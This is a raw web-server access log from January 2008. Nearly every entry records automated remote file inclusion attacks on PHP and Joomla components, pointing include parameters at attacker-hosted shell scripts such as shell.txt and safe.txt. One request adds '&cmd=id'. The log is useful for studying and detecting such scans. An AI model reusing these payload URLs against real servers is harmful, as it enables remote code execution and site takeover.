212.227.101.9 - - [18/Jan/2008:08:50:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.98.214.54 - - [18/Jan/2008:08:51:28 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.147.237.116 - - [18/Jan/2008:08:52:30 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [18/Jan/2008:08:52:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [18/Jan/2008:08:52:30 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.38.160.131 - - [18/Jan/2008:08:53:34 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.38.160.131 - - [18/Jan/2008:08:53:35 -0800] "GET /logs//admin.php?include_path=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:08:54:01 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://phpmaster.evolink.ro/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:08:54:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:08:54:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:08:54:05 -0800] "GET //skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:08:54:06 -0800] "GET //skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:08:54:46 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:08:54:52 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://m4by.100webspace.net/new3/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:08:54:54 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://m4by.100webspace.net/new3/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:08:54:54 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://m4by.100webspace.net/new3/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.214.165.164 - - [18/Jan/2008:08:56:31 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.1egc.ru/tool20.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.dmulk.com"
84.19.178.201 - - [18/Jan/2008:08:56:50 -0800] "GET /logs/index.php?option=com_anjel&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
84.19.178.201 - - [18/Jan/2008:08:56:50 -0800] "GET /index.php?option=com_anjel&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:08:57:18 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.geldstarter.de/phpBB/s1.txt????? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:08:57:18 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.geldstarter.de/phpBB/s1.txt????? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:08:57:55 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:08:57:55 -0800] "GET //skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:08:57:56 -0800] "GET //skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:08:57:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.111.176.53 - - [18/Jan/2008:08:58:18 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [18/Jan/2008:08:58:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [18/Jan/2008:08:58:20 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [18/Jan/2008:08:58:22 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:08:58:27 -0800] "GET //skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:08:58:27 -0800] "GET //skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:08:58:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:08:58:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.147.237.116 - - [18/Jan/2008:08:58:38 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:08:59:30 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:08:59:31 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:08:59:31 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:09:00:14 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:09:00:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:09:00:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:09:00:44 -0800] "GET //skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:09:00:45 -0800] "GET //skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
87.98.217.40 - - [18/Jan/2008:09:02:01 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.217.40 - - [18/Jan/2008:09:02:02 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.217.40 - - [18/Jan/2008:09:02:02 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.19.56 - - [18/Jan/2008:09:03:12 -0800] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.67.19.56 - - [18/Jan/2008:09:03:12 -0800] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim1??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
80.87.131.98 - - [18/Jan/2008:09:03:36 -0800] "GET /logs/index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:09:03:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:09:03:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:09:03:37 -0800] "GET //skin/zero_vote/error.php?dir=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:09:03:37 -0800] "GET //skin/zero_vote/error.php?dir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
80.87.131.98 - - [18/Jan/2008:09:03:39 -0800] "GET /index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:09:04:50 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
140.113.4.81 - - [18/Jan/2008:09:05:16 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [18/Jan/2008:09:05:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:09:06:43 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [18/Jan/2008:09:08:13 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:09:10:46 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:09:10:47 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:09:10:48 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:09:11:13 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:09:11:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:09:11:14 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:09:11:19 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.130.181 - - [18/Jan/2008:09:16:43 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://forum.matist.ru/files/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.130.181 - - [18/Jan/2008:09:16:44 -0800] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://forum.matist.ru/files/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.218.69 - - [18/Jan/2008:09:17:05 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.218.69 - - [18/Jan/2008:09:17:06 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.218.69 - - [18/Jan/2008:09:17:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.218.69 - - [18/Jan/2008:09:17:26 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.218.69 - - [18/Jan/2008:09:17:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.218.69 - - [18/Jan/2008:09:17:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.218.69 - - [18/Jan/2008:09:17:27 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:09:18:01 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:09:18:01 -0800] "GET /funny/ HTTP/1.1" 200 808 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:09:19:24 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:09:19:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:09:19:25 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:09:20:10 -0800] "GET /logs/access_071222.log//modules/My_eGallery/index.php?basepath=http://h1.ripway.com/modus/gambar/b??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:09:20:15 -0800] "GET //modules/My_eGallery/index.php?basepath=http://h1.ripway.com/modus/gambar/b??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:09:20:16 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://h1.ripway.com/modus/gambar/b??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:09:20:23 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:09:21:29 -0800] "GET /minamijewelry/html/contact.html HTTP/1.1" 200 12370 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:23:26 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:23:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:23:27 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:23:41 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:23:43 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:23:43 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:09:23:56 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:09:23:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:09:23:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:24:30 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:25:20 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:09:26:51 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:09:26:51 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:09:26:51 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:27:00 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:09:27:02 -0800] "GET /logs/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://64.70.238.131/tep/admin/includes/.r/happynewyear.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:09:27:03 -0800] "GET /index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://64.70.238.131/tep/admin/includes/.r/happynewyear.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:27:03 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:27:04 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [18/Jan/2008:09:27:04 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.218.51.165 - - [18/Jan/2008:09:27:26 -0800] "GET /logs/access_080101.log/Calendar/tools/send_reminders.php?noSethttp://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.218.51.165 - - [18/Jan/2008:09:27:26 -0800] "GET /Calendar/tools/send_reminders.php?noSethttp://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.218.51.165 - - [18/Jan/2008:09:27:27 -0800] "GET /logs/Calendar/tools/send_reminders.php?noSethttp://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.158.50 - - [18/Jan/2008:09:27:38 -0800] "GET /logs/access_071229.log/modules/4nAlbum/public/displayCategory.php?basepath=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [18/Jan/2008:09:27:38 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [18/Jan/2008:09:27:39 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:09:27:58 -0800] "GET /logs/access_071229.log/index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:09:27:58 -0800] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
